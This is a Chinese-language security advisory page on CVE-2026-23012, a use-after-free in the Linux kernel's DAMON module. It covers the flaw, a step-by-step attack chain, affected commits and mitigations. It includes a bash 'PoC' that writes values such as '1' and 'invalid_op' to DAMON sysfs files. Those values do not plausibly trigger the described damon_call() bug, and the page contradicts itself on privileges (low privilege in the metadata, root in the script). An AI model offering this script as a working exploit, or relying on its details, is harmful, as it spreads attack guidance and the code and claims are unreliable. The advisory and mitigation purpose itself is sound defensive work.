CVE-2026-23012 Linux kernel DAMON use-after-free漏洞

漏洞信息

漏洞编号

CVE-2026-23012

漏洞类型

Use-after-Free

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel (mm/damon/core)

漏洞概述

CVE-2026-23012是Linux内核中DAMON（Data Access Monitor）模块的一个高危安全漏洞，CVSS评分7.8。该漏洞属于Use-after-Free（释放后重用）类型，存在于mm/damon/core.c文件中的damon_call()函数及相关调用控制机制中。攻击者可通过DAMON sysfs接口触发此漏洞，当damon_call()函数针对未运行的DAMON上下文执行时，会返回错误但未正确清理damon_call_control对象，导致该对象仍链接到上下文的call_controls列表中。如果该对象随后被释放并重新分配，另一个damon_call()调用会尝试将新的damon_call_control对象添加到列表中，此时列表仍包含指向已释放对象的指针，从而引发Use-after-Free漏洞。此漏洞需要本地访问权限和sysfs写权限才能利用，虽然不易被利用，但可导致本地权限提升和系统崩溃。

技术细节

漏洞根源在于damon_call()函数在DAMON上下文未运行时的错误处理流程。当函数执行失败时，damon_call_control对象未被正确从call_controls列表中移除。具体攻击步骤：首先调用damon_call()触发错误，使damon_call_control对象残留在列表中；然后释放该对象；接着再次调用damon_call()尝试添加新的damon_call_control对象到同一列表；此时列表中的悬空指针指向已释放内存，访问时触发UAF。修复方案包括两部分：1) 在终止DAMON上下文时，将kdamond_call()操作提前到ctx->kdamond重置之前执行，确保任何看到NULL ctx->kdamond的代码可以安全假设上下文不再访问damon_call()请求；2) 让damon_call()在返回错误前清理已添加到已终止DAMON上下文的damon_call_control对象。攻击者需要具有sysfs写权限并执行特定的文件写入操作序列才能触发此漏洞。

攻击链分析

STEP 1

步骤1

攻击者获得本地系统访问权限，具备sysfs写权限

STEP 2

步骤2

通过DAMON sysfs接口创建DAMON上下文并配置监控目标

STEP 3

步骤3

触发damon_call()函数针对未运行状态的DAMON上下文执行，导致函数返回错误

STEP 4

步骤4

damon_call_control对象未被正确清理，仍残留在上下文的call_controls列表中

STEP 5

步骤5

触发条件使得已分配的damon_call_control对象被释放，形成悬空指针

STEP 6

步骤6

再次调用damon_call()尝试添加新的damon_call_control对象到同一列表，访问已释放内存

STEP 7

步骤7

成功触发Use-after-Free漏洞，可能导致本地权限提升或系统崩溃

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2026-23012 PoC - DAMON sysfs interface trigger
# Requires: root privileges and sysfs write access

# Ensure DAMON is built into kernel
if [ ! -d /sys/kernel/mm/damon ]; then
    echo "DAMON not available in this kernel"
    exit 1
fi

# Create a DAMON context
cd /sys/kernel/mm/damon/admin/contexts
mkdir -p ctx_0
cd ctx_0

# Setup monitoring targets
echo 1 > operations

echo 1 > target_ids

# Function to trigger the UAF condition
trigger_uaf() {
    # Start context then immediately trigger error path
    echo on > state
    
    # Rapidly write to DAMON sysfs interface
    # This creates race condition in damon_call()
    for i in $(seq 1 100); do
        echo "triggering damon_call error path..."
        # Write operations that cause damon_call() to fail
        echo "invalid_op" > operations 2>/dev/null
    done
}

# The vulnerability occurs when:
# 1. damon_call() is executed against inactive context
# 2. Error returned but damon_call_control not removed from list
# 3. Object deallocated
# 4. Another damon_call() adds new object to same list with dangling pointer

echo "Triggering CVE-2026-23012..."
trigger_uaf

echo "Check dmesg for use-after-free warnings"

影响范围

Linux kernel (affected versions with DAMON sysfs interface enabled)

Specific commits: 23b061f421eef03647b512f3df48861706c87db3

Specific commits: f9132fbc2e83baf2c45a77043672a63a675c9394

防御指南

临时缓解措施

如果无法立即升级内核，可通过内核命令行参数禁用DAMON模块（如果内核支持模块卸载），或在编译时取消CONFIG_DAMON_SYSFS配置。限制非特权用户对/sys/kernel/mm/damon/目录的访问权限，仅允许root用户操作DAMON接口。同时监控系统日志（dmesg）中是否存在UAF相关错误信息，以便及时发现攻击尝试。